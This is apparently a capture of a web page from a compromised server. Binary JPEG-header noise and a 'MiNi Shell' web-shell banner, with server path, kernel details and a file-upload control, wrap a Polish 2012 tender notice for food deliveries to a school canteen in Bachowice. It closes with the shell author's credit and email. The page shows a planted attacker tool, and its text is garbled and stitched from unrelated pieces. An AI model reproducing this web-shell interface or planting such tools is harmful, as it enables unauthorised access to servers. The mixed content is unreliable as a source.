JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121206/494192-N-2012.html

<p class="kh_header"><b>Spytkowice: Dostawa   żywności do stołówki na 2013 rok do 
Zespołu Szkolno -Przedszkolnego w Bachowicach 
ul. Ks. Gołby 1</b><br>
<b>Numer ogłoszenia: 494192 - 2012; data zamieszczenia: 06.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkolno-Przedszkolny , Bachowice, ul. Ks. Gołby 1, 34-116 Spytkowice, woj. małopolskie, tel. 0-33 879 18 92, faks 0-33 879 18 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zspbachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa   żywności do stołówki na 2013 rok do 
Zespołu Szkolno -Przedszkolnego w Bachowicach 
ul. Ks. Gołby 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej mieszczącej się w budynku Zespołu Szkolno Przedszkolnego w Bachowicach, 
ul. Ks. Gołby 1 z podziałem na 7 zadań (części)
Zadanie 1 :  Dostawa produktów spożywczych,  przypraw i przetworów 
Zadanie 2:   Dostawa warzyw i owoców 
Zadanie 3:   Dostawa mięsa, podrobów 
Zadanie 4:   Dostawa drobiu i wyrobów drobiarskich
Zadanie 5:   Dostawa pieczywa 
Zadanie 6:   Dostawa mleka oraz  przetworów mlecznych ,tłuszczy.
Zadanie 7:   Mrożonki, ryby  
2.Szczegółowy opis przedmiotu zamówienia został określony w formularzach cenowych  stanowiący załączniki (zadania nr 1, nr 2, nr 3, nr 4, nr 5, nr 6, nr 7 do Specyfikacji istotnych warunków zamówienia - stanowiący załącznik nr 1 do SIWZ 
Uwaga! Jeśli w jakimkolwiek punkcie załącznika (zadania) użyto nazwy towarowej - Wykonawca może złożyć ofertę na towar tożsamy lub równoważny do towaru, który wymieniono przy użyciu nazwy towarowej.
3. W postępowaniu dopuszcza się możliwość składania ofert częściowych, tj. na zadania wymienione w pkt. 1 z zastrzeżeniem, że jeden Wykonawca może złożyć tylko jedną ofertę na poszczególne zadanie, natomiast istnieje możliwość złożenia oferty na dwa lub więcej zadań. Część oferty (zadania) jest niepodzielna. 
4. Dostawa  towaru  sukcesywnie w zależności od potrzeb 2-3  razy w tygodniu z 1 dniowym  wyprzedzeniem telefonicznie lub faksem z wyłączeniem zadania 5, które będzie dostarczane codziennie.
5. Dostawa wraz z transportem i rozładunkiem do stołówki odbywać się będzie na koszt   Dostawcy.
6. Przedmiot i warunki realizacji niniejszego zamówienia winny być zgodne z ustawą z dnia 11 maja 2001 r. o warunkach zdrowotnych żywności i żywienia (Dz.U. z 2005 r. nr 31 poz. 265 z późn. zm.) oraz ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności 
i żywienia (Dz.U. z 2006 r. Nr 171 poz. 1225 z późn. zm) oraz innymi obowiązującymi przepisami prawnymi w tym zakresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.81.00.00-6, 15.50.00.00-3, 15.89.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24  ust 1 pkt  2  ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.), którzy spełniają warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych. Ocena spełnienia tego warunku  na podstawie dokumentów i oświadczeń  zasada spełnia nie /spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie  żadnych wymagań, których  Wykonawca  zobowiązny jest wykazać w sposób szczególny  Ocena spełnienia tego warunku  na podstawie  oświadczeń  zasada spełnia nie /spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie  żadnych wymagań, których  Wykonawca  zobowiązny jest wykazać w sposób szczególny  Ocena spełnienia tego warunku  na podstawie  oświadczeń  zasada spełnia nie /spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie  żadnych wymagań, których  Wykonawca  zobowiązny jest wykazać w sposób szczególny  Ocena spełnienia tego warunku  na podstawie  oświadczeń  zasada spełnia nie /spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie  żadnych wymagań, których  Wykonawca  zobowiązny jest wykazać w sposób szczególny  Ocena spełnienia tego warunku  na podstawie  oświadczeń  zasada spełnia nie /spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy  załącznik nr 1 do SIWZ ,istotne  postanowienia umowy zalącznik  nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ilość przedmiotu zamówienia w poszczególnych pozycjach formularza cenowego, który stanowi załącznik nr do SIWZ  podana jest szacunkowo. Ilość ta może ulegać zmianom w trakcie realizacji umowy. Ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb Zamawiającego w okresie obowiązywania umowy [np. zmniejszenie lub zwiększenie ilości uczniów korzystających ze stołówki]</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zspbachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Sekratariacie Zespołu Szkolno Przedszkolnego w Bachowicach ul.Ks Gołby 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2012 godzina 09:00, miejsce: Gabinet  Dyrektora  Zespołu Szkolno Przedszkolnego w Bachowicach ul.Ks,Gołby  1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa produktów spożywczych,  przypraw i przetworów w 2013r
do stołówki szkolnej Zespołu Szkolno Przedszkolnego
w Bachowicach ul. Ks. Gołby 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z transportem i rozładunkiem do stołówki  n/w produktów

1	Ryż biały długoziarnisty 1000g	kg	130
2	Ryż  karton  4x100g	szt..	220
3	Kasza jęczmienna  średnia 1000g	kg	60
4	Kasza karton  4x100 g	szt..	170
5	Kasza manna błyskawiczna 500szt	szt	20
6	Cukier kryształ biały 1000g	kg	250
7	Cukier puder 500g	szt	8
8	Bułka tarta   500 g	szt	410
9	Mąka pszenna Poznańska typ 500	kg	360
10	Mąka tortowa typ 450	kg	360
11	Mąka ziemniaczana 1000g	kg	55
12	Makaron nitki pięciojajeczny 250 g	szt.	120
13	Makaron świderki pięciojajeczmny 500 g	szt.	180
14	Makaron łazanka 250 g	szt.	20
15	Makaron spaghetti 500g	szt.	24
16	Makaron - tarte ciasto pięciojajeczny 250g	szt.	400
17	Przyprawa do mięs 75g 	szt.	8
18	Przyprawa do kurczaka 30 g 	szt.	60
19	Przyprawa do fasoli 20 g	szt.	15
20	Herbata ekspresowa(100  torebek)	szt.	4
21	Napój herbaciany, cytrynowy, granulowany 300g	szt.	30
22	Majeranek  8 g	szt.	35 
23	Musztarda  0,9 l.	szt.	10 
24	Majonez 700ml	szt.	100
25	Krem czekoladowo - orzechowy do smarowania 630g 	szt.	10
26	Kakao rozpuszczalne300 g	szt.	20 
27	Kawa zbożowa ekspresowa 84g 	szt.	20 
28	Płatki kulki czekoladowe 550g	szt.	30
29	Płatki kukurydziane 500g	szt.	30
30	Pasztet drobiowy160 g	szt.	60 
31	Ketchup łagodny 1000g	szt.	50
32	Maga, przyprawa w płynie (1 l )	szt.	92
33	Przyprawa warzywna sypka do potraw, wieloskładnikowa 1000g	szt.	90 
34	Sól jodowana biała 1000g	kg	110
35	Sol czosnkowa  40 g	szt.	140
36	Pieprz  mielony 50 g	szt.	50
37	Koncentrat pomidorowy 30% 1000g	szt.	100
38	Dżem owocowy, niesłodzony o zawartości nie mniej niż 40% owoców 280g	szt.	160
39	Marmolada  wieloowocowa 1100g	szt.	50
40	Zaprawa cytrynowa (1 l)	szt.	15 
41	Konserwa rybna filet śledź w sosie pomidorowym 170 g	szt.	10
42	Barszcz czerwony - koncentrat 300ml	szt.	40 
43	Barszcz czerwony - instant 170g	szt.	40 
44	Żurek kiszony w butelce 500ml	szt.	120 
45	Żurek w torebce 44g	szt.	60
46	Kwasek cytrynowy 50 g	szt.	8
47	Kukurydza konserwowa 400g	szt.	20 
48	Groszek konserwowy 400g	szt.	20 
49	Ocet   10% 500ml	szt.	35
50	Liść laurowy 6 g	szt.	25
51	Ziele angielskie 15g	szt.	25
52	Cynamon 15 g	szt.	5
53	Przyprawa do bigosu 20 g	szt	15
54	Przyprawa do fasoli 20 g	sz	15
55	Papryka słodka 20g	szt	80
56	Kminek 20 g	szt	8
57	Pieczarki krojone w zalewie solnej 900ml	szt	100
58	Sos sałatkowy, koperkowo ziołowy, torebka 9g	szt	60
59	Kisiel  77g	szt	10
60	Budyń 60g	szt	10
61	Sos boloński do spaghetti słoik 500g	szt	36
62	Sos boloński do spaghetti torebka 350g	szt	40
63	Soczek owocowy 100%owoców 200ml	szt	1000
64	Wafelek w mlecznej czekoladzie 37g	szt	200
65	Wafle familijne 230g	szt	12
66	Herbatniki 50g	szt	60
67	Czekolada  mleczna 100g	szt	200
68	Kostki rosołowe wołowe 180g	szt	20
69	Patyki do szaszłyków 50szt (opakowanie)	szt	40
70	Syrop owocowy 500ml	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa warzyw i owoców  w 2013 r do stołówki szkolnej  Zespołu Szkolno Przedszkolnego w Bachowicach ul. Ks. Gołby 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z transportem i rozładunkiem do stołówki n/w produktów 
1	Koperek świeży(pęczek)	szt.	90
2	Natka pietruszki (pęczek)	szt.	8
3	Szczypiorek pęczek	szt.	8
4	Pieczarka świeża	kg	30 
 5	Buraki czerwone świeże	kg 	250
6	Buraki czerwone suszone 100g	szt.	70
7	Ogórek konserwowy 0,9l	szt.	150
8	Ogórek kiszony 1kg	kg.	90
9	Pietruszka korzeń	kg	30
10	Marchew korzeń	kg	300 
11	Seler korzeń	kg	6
12	Cebula korzeń 	kg	240
13	Ziemniak typu kulinarnego	kg	5.500 
14	Ziemniak nowy sezonowy	kg	500
15	Kapusta czerwona świeża	kg	200
16	Kapusta biała 	kg	650
17	Kapusta biała w sezonie -nowa-	szt	50
18	Kapusta włoska świeża	szt.	100
19	Kapusta pekińska świeża	szt.	75 
20	Kapusta kiszona	kg	250
21	Jabłka	kg	320
22	Fasola Jaś średnia	kg	50
23	Banan	kg	150
24	Koperek suszony 25g	szt.	10
25	Pietruszka suszona 25g	szt.	10
26	Mandarynka	kg	60
27	Pomidor  świeży	kg	3
28	Pomidor w sezonie	kg	30
29	Ogórek Świeży 	kg	3
30	Ogórek w sezonie 	kg	60
31	Sałata zielona w sezonie	szt	60
32	Rzodkiewka w sezonie pęczek	szt	20
33	Kalafior świeży sezonowy 	szt.	16
34	Gruszka w sezonie	kg	5
35	Truskawka sezonowa	kg	10
36	Groch żółty połówki łuskany 	kg	10
37	Pomarańcza 	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mięsa, podrobów w 2013 r do stołówki szkolnej Zespołu Szkolno Przedszkolnego w Bachowicach ul. Ks. Gołby 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z transportem i rozładunkiem do stołówki  n/w produktów
1	Łopatka wieprz b/k	kg	220
2	Boczek surowy	kg	27
3	Schab wieprzowy z/k	kg	210
4	Szynka wieprzowa - surowa b/k	kg	560
5	Mięso wołowe rosołowe szponder	kg	15
6	Mięso wołowe żebra	kg	15
7	Parówka cielęca odłuszczona o zawartości cielęciny nie mniej niż 55%	kg	32
8	Polędwica drobiowa o zawartości mięsa nie mniej niż 65%	kg	5
9	Kiełbasa zwyczajna	kg	65
10	Boczek wędzony, parzony	kg	40
11	Smalec 	kg	15
12	Szynka drobiowa o zawartości mięsa nie mniej niż 75%	kg	5
13	Szynka gotowana wieprzowa	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa drobiu i wyrobów drobiarskich w 2013 r do stołówki  szkolnej 
   Zespołu Szkolno Przedszkolnego w Bachowicach ul. Ks. Gołby 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z transportem i rozładunkiem do stołówki n/w produktów
 1	Filet z kurczaka	kg	750 
2	Porcja rosołowa z kurczaka	kg	300 
3	Mięso drobne z kurczaka	kg	400 
4	Udka z kurczaka	kg	500 
5	Kurczak	kg	300 
	Podudzie z kurczaka	kg	30
	Wątróbka z kurczaka	kg	30
	Żołądek z kurczaka	kg	20
	Serce z kurczaka	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa pieczywa w 2013 r. do stołówki szkolnej Zespołu Szkolno
Przedszkolnego w Bachowicach ul. Ks. Gołby 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z transportem i rozładunkiem do stołówki  n/w prodktów :
1	Chleb duży pszenno-żytni 1000g	szt.	230
2	Bułka kajzerka 70g	szt.	400
3	Weka krojona 350g	szt.	20
4	Graham krojony 400g	szt.	20
5	Drożdżówki 100g	szt.	200 
6	Drożdżówki 70g		200
7	Bułka grahamka 80g	szt.	40
8	Bułka zwykła 100g	szt.	300
9	Chleb ziarnisty krojony 400g	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa mleka oraz przetworów mlecznych, tłuszczy w 2013 r do stołówki  szkolnej Zespołu Szkolno Przedszkolnego w Bachowicach ul. Ks. Gołby 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z transportem i rozładunkiem do stołówki  n/w  produktów.

1	Twaróg mielony biały półtłusty
	kg.	240
2	Twaróg półtłusty kostka 	kg	80 
3	Drożdże 100g	szt.	70
4	Ser żółty półtłusty	kg	20
5	Ser żółty krojony w plastrach 150g	szt.	20
6	Serek topiony 100 g o zawartości tłuszczu nie mniej niż 25%	szt.	60
7	Masło śmietankowe, o zawartości tłuszczu nie mniej niż 82 %, 200g	szt.	230
8	Margaryna Palma 250 g	szt.	250
9	Śmietana 30%    500ml	szt.	560
10	Śmietana 18% 330 g kubek	szt.	170
11	Mleko folia 2%  900ml	Szt	250
12	Mleko kart.2% 1 l	szt.	360
13	Jogurt z kawałkami owoców 150 g	szt.	1200
14	Jogurt naturalny 350g	szt.	12
15	Kefir mały 250g	szt.	200
16	Śmietana w kartonie 30 % 
 (500ml)	szt.	60
17.	Jaja kurze klasy A 	szt.	4700
18.	Olej roślinny do sałatek i smażenia 5l	Szt.	145.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa mrożonek i ryb w 2013 r. do stołówki szkolnej Zespołu Szkolno Przedszkolnego w Bachowicach ul. Ks. Gołby 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z transportem i rozładunkiem do stołówki n/w produktów
 1	Ryby Morszczuk (filety bez ości, bez glazury, bez skóry) 	Kg	90
2	Ryby Panga (filety bez ości, bez glazury, bez skóry)	Kg	90
3	Ryby Miruna (filety bez ości, bez glazury, bez skóry)	kg 	90
4	Kalafior mrożony   2500 g	Szt	50
5	Bukiet jarzyn mrożony 2500g	Szt	12
6	Brukselka mrożona  2500 g	Szt	6
7	Marchew mrożona kostka 2500g	Szt	14
8	Marchew krojona kostka z groszkiem mrożona 2500g	Szt	5
9	Mieszanka kompotowa mrożona 2500g	Szt	125
10	Truskawka mrożona 2500g	Szt	27
11	Frytki mrożone 2500g	Szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com